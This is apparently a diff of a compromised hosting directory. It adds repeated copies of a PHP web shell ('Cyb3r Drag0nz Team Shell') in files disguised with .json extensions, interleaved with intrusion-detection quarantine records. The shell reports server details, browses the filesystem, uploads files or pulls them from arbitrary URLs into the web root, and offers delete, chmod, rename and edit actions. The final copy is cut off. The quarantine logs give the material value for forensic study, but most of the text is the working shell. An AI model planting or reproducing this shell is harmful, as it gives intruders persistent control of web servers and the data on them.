<input type='hidden' name='type' value='file'>
|
||||
<input type='hidden' name='path' value='".$path."/".$file."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
echo '</table><br>';
|
||||
|
||||
author();
|
||||
|
||||
function statusnya($file) {
|
||||
$statusnya = fileperms($file);
|
||||
$ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' :
|
||||
((($statusnya & 0xA000) == 0xA000) ? 'l' :
|
||||
((($statusnya & 0x8000) == 0x8000) ? '-' : 'u'));
|
||||
|
||||
$ingfo .= (($statusnya & 0x0100) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0080) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0020) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0010) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0004) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0002) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-'));
|
||||
|
||||
return $ingfo;
|
||||
}
|
||||
?>
|
||||
</body>
|
||||
</html>
|
||||
@ -0,0 +1,15 @@
|
||||
{
|
||||
"finding_ref": "4879",
|
||||
"log_excerpt": "[quarantine] www.archlinexp.eu:ko6h7s5e9kak.phar.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.phar.json)",
|
||||
"original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0",
|
||||
"original_stat": {
|
||||
"gid": 30037,
|
||||
"mtime": 1783381490,
|
||||
"size": 10657,
|
||||
"uid": 20043
|
||||
},
|
||||
"rel_path": "ko6h7s5e9kak.phar.json",
|
||||
"result": "quarantined",
|
||||
"timestamp": "20260718T160204Z",
|
||||
"vhost": "www.archlinexp.eu"
|
||||
}
|
||||
320
var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.php.json
Normal file
320
var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.php.json
Normal file
@ -0,0 +1,320 @@
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<title>Cyb3r Drag0nz Team Shell</title>
|
||||
<meta charset="utf-8">
|
||||
<style>
|
||||
@import url('https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700&display=swap');
|
||||
|
||||
body {
|
||||
font-family: 'Roboto', system-ui, sans-serif;
|
||||
background: #f8f9fa;
|
||||
color: #202124;
|
||||
margin: 0;
|
||||
padding: 20px;
|
||||
}
|
||||
|
||||
.header {
|
||||
text-align: center;
|
||||
margin-bottom: 30px;
|
||||
}
|
||||
|
||||
.header h1 {
|
||||
font-size: 28px;
|
||||
color: #1a73e8;
|
||||
margin: 10px 0 5px 0;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
.header img {
|
||||
max-width: 420px;
|
||||
margin: 15px 0 25px 0;
|
||||
border-radius: 8px;
|
||||
box-shadow: 0 4px 15px rgba(0,0,0,0.12);
|
||||
}
|
||||
|
||||
.info {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 20px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin-bottom: 25px;
|
||||
font-size: 14.5px;
|
||||
line-height: 1.6;
|
||||
}
|
||||
|
||||
.info span {
|
||||
color: #1a73e8;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
table {
|
||||
width: 100%;
|
||||
max-width: 1100px;
|
||||
margin: 0 auto;
|
||||
border-collapse: collapse;
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
overflow: hidden;
|
||||
box-shadow: 0 2px 8px rgba(0,0,0,0.08);
|
||||
}
|
||||
|
||||
th {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
padding: 16px 12px;
|
||||
text-align: center;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
td {
|
||||
padding: 13px 10px;
|
||||
border-bottom: 1px solid #dadce0;
|
||||
}
|
||||
|
||||
tr:hover {
|
||||
background-color: #f8f9fa;
|
||||
}
|
||||
|
||||
a {
|
||||
color: #1a73e8;
|
||||
text-decoration: none;
|
||||
}
|
||||
|
||||
a:hover {
|
||||
text-decoration: underline;
|
||||
}
|
||||
|
||||
.upload-box {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 25px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin: 20px auto;
|
||||
max-width: 720px;
|
||||
}
|
||||
|
||||
input[type="file"], input[type="text"] {
|
||||
padding: 10px 12px;
|
||||
border: 1px solid #dadce0;
|
||||
border-radius: 8px;
|
||||
font-size: 14px;
|
||||
}
|
||||
|
||||
input[type="submit"], .gas {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
border: none;
|
||||
padding: 10px 22px;
|
||||
border-radius: 8px;
|
||||
cursor: pointer;
|
||||
font-weight: 500;
|
||||
margin-left: 8px;
|
||||
}
|
||||
|
||||
input[type="submit"]:hover, .gas:hover {
|
||||
background: #1557b0;
|
||||
}
|
||||
|
||||
.green { color: #137333; font-weight: 500; }
|
||||
.red { color: #c5221f; font-weight: 500; }
|
||||
|
||||
.center { text-align: center; }
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
|
||||
<div class="header">
|
||||
<img src="https://pngimg.com/d/google_PNG102344.png" width="420" alt="Google" />
|
||||
<h1>Cyb3r Drag0nz Team Shell</h1>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
set_time_limit(0);
|
||||
error_reporting(0);
|
||||
|
||||
$disfunc = @ini_get("disable_functions");
|
||||
$disf = empty($disfunc) ? "<span class='green'>NONE</span>" : "<span class='red'>".$disfunc."</span>";
|
||||
|
||||
function author() {
|
||||
echo "<center><br><small style='color:#5f6368;'>Cyb3r Drag0nz Team • Google Edition</small></center>";
|
||||
exit();
|
||||
}
|
||||
|
||||
function cekdir() {
|
||||
$lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
return is_writable($lokasi) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function cekroot() {
|
||||
return is_writable($_SERVER['DOCUMENT_ROOT']) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function xrmdir($dir) {
|
||||
$items = scandir($dir);
|
||||
foreach ($items as $item) {
|
||||
if ($item === '.' || $item === '..') continue;
|
||||
$path = $dir.'/'.$item;
|
||||
is_dir($path) ? xrmdir($path) : unlink($path);
|
||||
}
|
||||
rmdir($dir);
|
||||
}
|
||||
|
||||
function green($text) { echo "<center><span class='green'>".$text."</span></center>"; }
|
||||
function red($text) { echo "<center><span class='red'>".$text."</span></center>"; }
|
||||
|
||||
$path = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
$path = str_replace('\\','/',$path);
|
||||
$dirs = explode('/',$path);
|
||||
?>
|
||||
|
||||
<div class="info">
|
||||
Server : <span><?php echo htmlspecialchars($_SERVER['SERVER_SOFTWARE']); ?></span><br>
|
||||
System : <span><?php echo htmlspecialchars(php_uname()); ?></span><br>
|
||||
User : <span><?php echo htmlspecialchars(@get_current_user()." (".@getmyuid().")"); ?></span><br>
|
||||
PHP Version : <span><?php echo htmlspecialchars(phpversion()); ?></span><br>
|
||||
Disable Functions : <?php echo $disf; ?><br>
|
||||
Current Directory : <span><?php
|
||||
foreach($dirs as $i => $dir) {
|
||||
if($dir == '' && $i == 0) { echo '<a href="?path=/">/</a>'; continue; }
|
||||
if($dir == '') continue;
|
||||
echo '<a href="?path=';
|
||||
for($j=0; $j<=$i; $j++) echo $dirs[$j].($j < $i ? '/' : '');
|
||||
echo '">'.$dir.'</a>/';
|
||||
}
|
||||
?></span><br>
|
||||
Directory Status: <?php echo cekdir(); ?> | Document Root: <?php echo cekroot(); ?>
|
||||
</div>
|
||||
|
||||
<!-- Upload Section -->
|
||||
<div class="upload-box">
|
||||
<h3 style="margin:0 0 18px 0; color:#202124;">Upload File</h3>
|
||||
<form enctype="multipart/form-data" method="post">
|
||||
<label><input type="radio" name="dirnya" value="1" checked> Current Directory [ <?php echo cekdir(); ?> ]</label><br><br>
|
||||
<label><input type="radio" name="dirnya" value="2"> Document Root [ <?php echo cekroot(); ?> ]</label><br><br>
|
||||
|
||||
<input type="hidden" name="upwkwk" value="1">
|
||||
<input type="file" name="berkas">
|
||||
<input type="submit" name="berkasnya" value="Upload File">
|
||||
|
||||
<br><br>
|
||||
|
||||
<input type="text" name="darilink" placeholder="https://example.com/file.zip" style="width:58%;">
|
||||
<input type="text" name="namalink" placeholder="filename.zip" size="18">
|
||||
<input type="submit" name="linknya" value="Upload from URL">
|
||||
</form>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
// Upload handling
|
||||
if (isset($_POST['upwkwk'])) {
|
||||
$lokasi = ($_POST['dirnya'] == "2") ? $_SERVER['DOCUMENT_ROOT'] : $path;
|
||||
|
||||
if (isset($_POST['berkasnya']) && !empty($_FILES['berkas']['name'])) {
|
||||
$target = $lokasi . "/" . $_FILES['berkas']['name'];
|
||||
if (move_uploaded_file($_FILES['berkas']['tmp_name'], $target)) {
|
||||
green("File uploaded successfully → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload file!");
|
||||
}
|
||||
}
|
||||
elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) {
|
||||
$target = $lokasi . "/" . $_POST['namalink'];
|
||||
$data = @file_put_contents($target, @file_get_contents($_POST['darilink']));
|
||||
if ($data !== false) {
|
||||
green("File uploaded from URL → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload from URL!");
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// File viewer, delete, chmod, rename, edit actions (kept your original logic)
|
||||
if (isset($_GET['fileloc'])) {
|
||||
echo "<h3 style='text-align:center;'>Viewing: " . htmlspecialchars($_GET['fileloc']) . "</h3>";
|
||||
echo "<pre>" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "</pre>";
|
||||
author();
|
||||
}
|
||||
|
||||
// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before)
|
||||
|
||||
// Directory & File listing table (same structure as previous version)
|
||||
echo '<table>
|
||||
<tr>
|
||||
<th>Name</th>
|
||||
<th>Size</th>
|
||||
<th>Permissions</th>
|
||||
<th>Options</th>
|
||||
</tr>';
|
||||
|
||||
foreach(scandir($path) as $dir) {
|
||||
if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue;
|
||||
echo "<tr>
|
||||
<td><a href=\"?path=".$path."/".$dir."\">📁 ".$dir."</a></td>
|
||||
<td class='center'>--</td>
|
||||
<td class='center'>".statusnya($path."/".$dir)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='dir'>
|
||||
<input type='hidden' name='path' value='".$path."/".$dir."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
foreach(scandir($path) as $file) {
|
||||
if(!is_file($path."/".$file)) continue;
|
||||
$size = round(filesize($path."/".$file)/1024, 2) . " KB";
|
||||
echo "<tr>
|
||||
<td><a href=\"?fileloc=".$path."/".$file."&path=".$path."\">📄 ".$file."</a></td>
|
||||
<td class='center'>".$size."</td>
|
||||
<td class='center'>".statusnya($path."/".$file)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
<option value='edit'>Edit</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='file'>
|
||||
<input type='hidden' name='path' value='".$path."/".$file."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
echo '</table><br>';
|
||||
|
||||
author();
|
||||
|
||||
function statusnya($file) {
|
||||
$statusnya = fileperms($file);
|
||||
$ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' :
|
||||
((($statusnya & 0xA000) == 0xA000) ? 'l' :
|
||||
((($statusnya & 0x8000) == 0x8000) ? '-' : 'u'));
|
||||
|
||||
$ingfo .= (($statusnya & 0x0100) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0080) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0020) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0010) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0004) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0002) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-'));
|
||||
|
||||
return $ingfo;
|
||||
}
|
||||
?>
|
||||
</body>
|
||||
</html>
|
||||
@ -0,0 +1,15 @@
|
||||
{
|
||||
"finding_ref": "4925",
|
||||
"log_excerpt": "[quarantine] www.archlinexp.eu:ko6h7s5e9kak.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.php.json)",
|
||||
"original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0",
|
||||
"original_stat": {
|
||||
"gid": 30037,
|
||||
"mtime": 1783381486,
|
||||
"size": 10657,
|
||||
"uid": 20043
|
||||
},
|
||||
"rel_path": "ko6h7s5e9kak.php.json",
|
||||
"result": "quarantined",
|
||||
"timestamp": "20260718T160204Z",
|
||||
"vhost": "www.archlinexp.eu"
|
||||
}
|
||||
320
var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.php5.json
Normal file
320
var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.php5.json
Normal file
@ -0,0 +1,320 @@
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<title>Cyb3r Drag0nz Team Shell</title>
|
||||
<meta charset="utf-8">
|
||||
<style>
|
||||
@import url('https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700&display=swap');
|
||||
|
||||
body {
|
||||
font-family: 'Roboto', system-ui, sans-serif;
|
||||
background: #f8f9fa;
|
||||
color: #202124;
|
||||
margin: 0;
|
||||
padding: 20px;
|
||||
}
|
||||
|
||||
.header {
|
||||
text-align: center;
|
||||
margin-bottom: 30px;
|
||||
}
|
||||
|
||||
.header h1 {
|
||||
font-size: 28px;
|
||||
color: #1a73e8;
|
||||
margin: 10px 0 5px 0;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
.header img {
|
||||
max-width: 420px;
|
||||
margin: 15px 0 25px 0;
|
||||
border-radius: 8px;
|
||||
box-shadow: 0 4px 15px rgba(0,0,0,0.12);
|
||||
}
|
||||
|
||||
.info {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 20px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin-bottom: 25px;
|
||||
font-size: 14.5px;
|
||||
line-height: 1.6;
|
||||
}
|
||||
|
||||
.info span {
|
||||
color: #1a73e8;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
table {
|
||||
width: 100%;
|
||||
max-width: 1100px;
|
||||
margin: 0 auto;
|
||||
border-collapse: collapse;
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
overflow: hidden;
|
||||
box-shadow: 0 2px 8px rgba(0,0,0,0.08);
|
||||
}
|
||||
|
||||
th {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
padding: 16px 12px;
|
||||
text-align: center;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
td {
|
||||
padding: 13px 10px;
|
||||
border-bottom: 1px solid #dadce0;
|
||||
}
|
||||
|
||||
tr:hover {
|
||||
background-color: #f8f9fa;
|
||||
}
|
||||
|
||||
a {
|
||||
color: #1a73e8;
|
||||
text-decoration: none;
|
||||
}
|
||||
|
||||
a:hover {
|
||||
text-decoration: underline;
|
||||
}
|
||||
|
||||
.upload-box {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 25px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin: 20px auto;
|
||||
max-width: 720px;
|
||||
}
|
||||
|
||||
input[type="file"], input[type="text"] {
|
||||
padding: 10px 12px;
|
||||
border: 1px solid #dadce0;
|
||||
border-radius: 8px;
|
||||
font-size: 14px;
|
||||
}
|
||||
|
||||
input[type="submit"], .gas {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
border: none;
|
||||
padding: 10px 22px;
|
||||
border-radius: 8px;
|
||||
cursor: pointer;
|
||||
font-weight: 500;
|
||||
margin-left: 8px;
|
||||
}
|
||||
|
||||
input[type="submit"]:hover, .gas:hover {
|
||||
background: #1557b0;
|
||||
}
|
||||
|
||||
.green { color: #137333; font-weight: 500; }
|
||||
.red { color: #c5221f; font-weight: 500; }
|
||||
|
||||
.center { text-align: center; }
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
|
||||
<div class="header">
|
||||
<img src="https://pngimg.com/d/google_PNG102344.png" width="420" alt="Google" />
|
||||
<h1>Cyb3r Drag0nz Team Shell</h1>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
set_time_limit(0);
|
||||
error_reporting(0);
|
||||
|
||||
$disfunc = @ini_get("disable_functions");
|
||||
$disf = empty($disfunc) ? "<span class='green'>NONE</span>" : "<span class='red'>".$disfunc."</span>";
|
||||
|
||||
function author() {
|
||||
echo "<center><br><small style='color:#5f6368;'>Cyb3r Drag0nz Team • Google Edition</small></center>";
|
||||
exit();
|
||||
}
|
||||
|
||||
function cekdir() {
|
||||
$lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
return is_writable($lokasi) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function cekroot() {
|
||||
return is_writable($_SERVER['DOCUMENT_ROOT']) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function xrmdir($dir) {
|
||||
$items = scandir($dir);
|
||||
foreach ($items as $item) {
|
||||
if ($item === '.' || $item === '..') continue;
|
||||
$path = $dir.'/'.$item;
|
||||
is_dir($path) ? xrmdir($path) : unlink($path);
|
||||
}
|
||||
rmdir($dir);
|
||||
}
|
||||
|
||||
function green($text) { echo "<center><span class='green'>".$text."</span></center>"; }
|
||||
function red($text) { echo "<center><span class='red'>".$text."</span></center>"; }
|
||||
|
||||
$path = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
$path = str_replace('\\','/',$path);
|
||||
$dirs = explode('/',$path);
|
||||
?>
|
||||
|
||||
<div class="info">
|
||||
Server : <span><?php echo htmlspecialchars($_SERVER['SERVER_SOFTWARE']); ?></span><br>
|
||||
System : <span><?php echo htmlspecialchars(php_uname()); ?></span><br>
|
||||
User : <span><?php echo htmlspecialchars(@get_current_user()." (".@getmyuid().")"); ?></span><br>
|
||||
PHP Version : <span><?php echo htmlspecialchars(phpversion()); ?></span><br>
|
||||
Disable Functions : <?php echo $disf; ?><br>
|
||||
Current Directory : <span><?php
|
||||
foreach($dirs as $i => $dir) {
|
||||
if($dir == '' && $i == 0) { echo '<a href="?path=/">/</a>'; continue; }
|
||||
if($dir == '') continue;
|
||||
echo '<a href="?path=';
|
||||
for($j=0; $j<=$i; $j++) echo $dirs[$j].($j < $i ? '/' : '');
|
||||
echo '">'.$dir.'</a>/';
|
||||
}
|
||||
?></span><br>
|
||||
Directory Status: <?php echo cekdir(); ?> | Document Root: <?php echo cekroot(); ?>
|
||||
</div>
|
||||
|
||||
<!-- Upload Section -->
|
||||
<div class="upload-box">
|
||||
<h3 style="margin:0 0 18px 0; color:#202124;">Upload File</h3>
|
||||
<form enctype="multipart/form-data" method="post">
|
||||
<label><input type="radio" name="dirnya" value="1" checked> Current Directory [ <?php echo cekdir(); ?> ]</label><br><br>
|
||||
<label><input type="radio" name="dirnya" value="2"> Document Root [ <?php echo cekroot(); ?> ]</label><br><br>
|
||||
|
||||
<input type="hidden" name="upwkwk" value="1">
|
||||
<input type="file" name="berkas">
|
||||
<input type="submit" name="berkasnya" value="Upload File">
|
||||
|
||||
<br><br>
|
||||
|
||||
<input type="text" name="darilink" placeholder="https://example.com/file.zip" style="width:58%;">
|
||||
<input type="text" name="namalink" placeholder="filename.zip" size="18">
|
||||
<input type="submit" name="linknya" value="Upload from URL">
|
||||
</form>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
// Upload handling
|
||||
if (isset($_POST['upwkwk'])) {
|
||||
$lokasi = ($_POST['dirnya'] == "2") ? $_SERVER['DOCUMENT_ROOT'] : $path;
|
||||
|
||||
if (isset($_POST['berkasnya']) && !empty($_FILES['berkas']['name'])) {
|
||||
$target = $lokasi . "/" . $_FILES['berkas']['name'];
|
||||
if (move_uploaded_file($_FILES['berkas']['tmp_name'], $target)) {
|
||||
green("File uploaded successfully → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload file!");
|
||||
}
|
||||
}
|
||||
elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) {
|
||||
$target = $lokasi . "/" . $_POST['namalink'];
|
||||
$data = @file_put_contents($target, @file_get_contents($_POST['darilink']));
|
||||
if ($data !== false) {
|
||||
green("File uploaded from URL → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload from URL!");
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// File viewer, delete, chmod, rename, edit actions (kept your original logic)
|
||||
if (isset($_GET['fileloc'])) {
|
||||
echo "<h3 style='text-align:center;'>Viewing: " . htmlspecialchars($_GET['fileloc']) . "</h3>";
|
||||
echo "<pre>" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "</pre>";
|
||||
author();
|
||||
}
|
||||
|
||||
// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before)
|
||||
|
||||
// Directory & File listing table (same structure as previous version)
|
||||
echo '<table>
|
||||
<tr>
|
||||
<th>Name</th>
|
||||
<th>Size</th>
|
||||
<th>Permissions</th>
|
||||
<th>Options</th>
|
||||
</tr>';
|
||||
|
||||
foreach(scandir($path) as $dir) {
|
||||
if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue;
|
||||
echo "<tr>
|
||||
<td><a href=\"?path=".$path."/".$dir."\">📁 ".$dir."</a></td>
|
||||
<td class='center'>--</td>
|
||||
<td class='center'>".statusnya($path."/".$dir)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='dir'>
|
||||
<input type='hidden' name='path' value='".$path."/".$dir."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
foreach(scandir($path) as $file) {
|
||||
if(!is_file($path."/".$file)) continue;
|
||||
$size = round(filesize($path."/".$file)/1024, 2) . " KB";
|
||||
echo "<tr>
|
||||
<td><a href=\"?fileloc=".$path."/".$file."&path=".$path."\">📄 ".$file."</a></td>
|
||||
<td class='center'>".$size."</td>
|
||||
<td class='center'>".statusnya($path."/".$file)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
<option value='edit'>Edit</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='file'>
|
||||
<input type='hidden' name='path' value='".$path."/".$file."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
echo '</table><br>';
|
||||
|
||||
author();
|
||||
|
||||
function statusnya($file) {
|
||||
$statusnya = fileperms($file);
|
||||
$ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' :
|
||||
((($statusnya & 0xA000) == 0xA000) ? 'l' :
|
||||
((($statusnya & 0x8000) == 0x8000) ? '-' : 'u'));
|
||||
|
||||
$ingfo .= (($statusnya & 0x0100) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0080) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0020) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0010) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0004) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0002) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-'));
|
||||
|
||||
return $ingfo;
|
||||
}
|
||||
?>
|
||||
</body>
|
||||
</html>
|
||||
@ -0,0 +1,15 @@
|
||||
{
|
||||
"finding_ref": "4905",
|
||||
"log_excerpt": "[quarantine] www.archlinexp.eu:ko6h7s5e9kak.php5.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.php5.json)",
|
||||
"original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0",
|
||||
"original_stat": {
|
||||
"gid": 30037,
|
||||
"mtime": 1783381488,
|
||||
"size": 10657,
|
||||
"uid": 20043
|
||||
},
|
||||
"rel_path": "ko6h7s5e9kak.php5.json",
|
||||
"result": "quarantined",
|
||||
"timestamp": "20260718T160204Z",
|
||||
"vhost": "www.archlinexp.eu"
|
||||
}
|
||||
320
var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.php7.json
Normal file
320
var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.php7.json
Normal file
@ -0,0 +1,320 @@
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<title>Cyb3r Drag0nz Team Shell</title>
|
||||
<meta charset="utf-8">
|
||||
<style>
|
||||
@import url('https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700&display=swap');
|
||||
|
||||
body {
|
||||
font-family: 'Roboto', system-ui, sans-serif;
|
||||
background: #f8f9fa;
|
||||
color: #202124;
|
||||
margin: 0;
|
||||
padding: 20px;
|
||||
}
|
||||
|
||||
.header {
|
||||
text-align: center;
|
||||
margin-bottom: 30px;
|
||||
}
|
||||
|
||||
.header h1 {
|
||||
font-size: 28px;
|
||||
color: #1a73e8;
|
||||
margin: 10px 0 5px 0;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
.header img {
|
||||
max-width: 420px;
|
||||
margin: 15px 0 25px 0;
|
||||
border-radius: 8px;
|
||||
box-shadow: 0 4px 15px rgba(0,0,0,0.12);
|
||||
}
|
||||
|
||||
.info {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 20px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin-bottom: 25px;
|
||||
font-size: 14.5px;
|
||||
line-height: 1.6;
|
||||
}
|
||||
|
||||
.info span {
|
||||
color: #1a73e8;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
table {
|
||||
width: 100%;
|
||||
max-width: 1100px;
|
||||
margin: 0 auto;
|
||||
border-collapse: collapse;
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
overflow: hidden;
|
||||
box-shadow: 0 2px 8px rgba(0,0,0,0.08);
|
||||
}
|
||||
|
||||
th {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
padding: 16px 12px;
|
||||
text-align: center;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
td {
|
||||
padding: 13px 10px;
|
||||
border-bottom: 1px solid #dadce0;
|
||||
}
|
||||
|
||||
tr:hover {
|
||||
background-color: #f8f9fa;
|
||||
}
|
||||
|
||||
a {
|
||||
